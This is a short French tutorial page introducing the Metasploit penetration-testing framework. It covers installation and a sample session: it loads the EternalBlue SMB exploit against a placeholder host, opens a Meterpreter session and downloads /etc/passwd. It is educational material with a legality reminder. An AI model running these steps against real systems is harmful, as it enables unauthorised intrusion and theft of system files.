Skip to content

Présentation de Metasploit

💻 Présentation

Metasploit est un framework open-source de tests d’intrusion permettant de rechercher, exploiter et vérifier des vulnérabilités sur des systèmes cibles. Il est très répandu dans les audits de sécurité offensive.

🚀 Fonctionnalités principales

  • Rechercher des failles connues (CVE)

  • Utiliser des exploits préconfigurés

  • Lancer des charges utiles (payloads)

  • Maintenir un accès avec Meterpreter

  • Automatiser des tests via scripts

🔧 Cas d'utilisation

  • Tests de pénétration internes et externes

  • Simulations d'attaques réalistes

  • Vérification de la résilience aux failles connues

📥 Configuration rapide

Linux (Debian/Ubuntu)

apt update && apt install metasploit-framework

macOS

brew install metasploit

Windows

Télécharger Metasploit : https://www.metasploit.com/download

Démarrage

Lancer l’interface principale :

msfconsole

Exemples d’utilisation

Rechercher un exploit

search exploit windows/smb

Charger un module

use exploit/windows/smb/ms17_010_eternalblue

Configurer la cible

set RHOSTS 192.168.X.X
set LHOST 192.168.X.X

Lancer l'exploit

exploit

Post-exploitation avec Meterpreter

Ouvrir une session

sessions -i 1

Télécharger un fichier

download /etc/passwd

🤔 À retenir

  • Metasploit est puissant, mais doit être utilisé uniquement en environnement légal et contrôlé

  • Il est souvent associé à Kali Linux mais fonctionne sur tout OS compatible

  • De nombreuses ressources existent pour se former, notamment sur le site officiel ou via des labs (TryHackMe, HackTheBox)